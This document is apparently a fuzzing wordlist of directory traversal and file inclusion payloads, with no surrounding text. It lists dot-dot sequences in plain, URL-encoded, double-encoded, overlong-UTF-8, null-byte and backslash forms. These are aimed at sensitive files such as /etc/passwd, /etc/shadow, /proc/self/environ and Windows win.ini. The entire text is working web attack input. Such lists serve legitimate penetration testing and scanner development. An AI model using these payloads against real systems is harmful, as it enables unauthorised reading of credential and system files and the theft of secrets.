../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../
../../../../../../../../../../
..%2f
..%2f..%2f
..%2f..%2f..%2f
..%2f..%2f..%2f..%2f
..%2f..%2f..%2f..%2f..%2f
....//
....//....//
....//....//....//
....//....//....//....//
..;/
..;/..;/
..;/..;/..;/
..;/..;/..;/..;/
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
..%2fetc%2fpasswd
..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fpasswd
....//etc/passwd
....//....//etc/passwd
..;/etc/passwd
..;/..;/etc/passwd
../windows/win.ini
../../windows/win.ini
../../../windows/win.ini
../../../../windows/win.ini
..%2fwindows%2fwin.ini
..%2f..%2fwindows%2fwin.ini
....//windows/win.ini
....//....//windows/win.ini
..;/windows/win.ini
..;/..;/windows/win.ini
..\..\
..\..\..\
..\..\..\..\
..\..\..\..\..\
..\..\..\..\..\..\
..\..\..\..\..\..\..\
..%5c
..%5c..%5c
..%5c..%5c..%5c
..%5c..%5c..%5c..%5c
..\windows\win.ini
..\..\windows\win.ini
..\..\..\windows\win.ini
..%5cwindows%5cwin.ini
..%5c..%5cwindows%5cwin.ini
/etc/passwd
/etc/shadow
/etc/hosts
/etc/motd
/etc/issue
/proc/self/environ
/proc/version
/proc/cmdline
C:\windows\win.ini
C:\boot.ini
C:\windows\system32\drivers\etc\hosts
%00
%00.jpg
.%00.
..%00/
..%00%2f
..%2500
..%c0%af
..%252f
..%c1%9c
file:///etc/passwd
file:///c:/windows/win.ini
....\/
....\/....\/
....\/....\/....\/
..%c0%af..%c0%af
..%252f..%252f
..%c1%9c..%c1%9c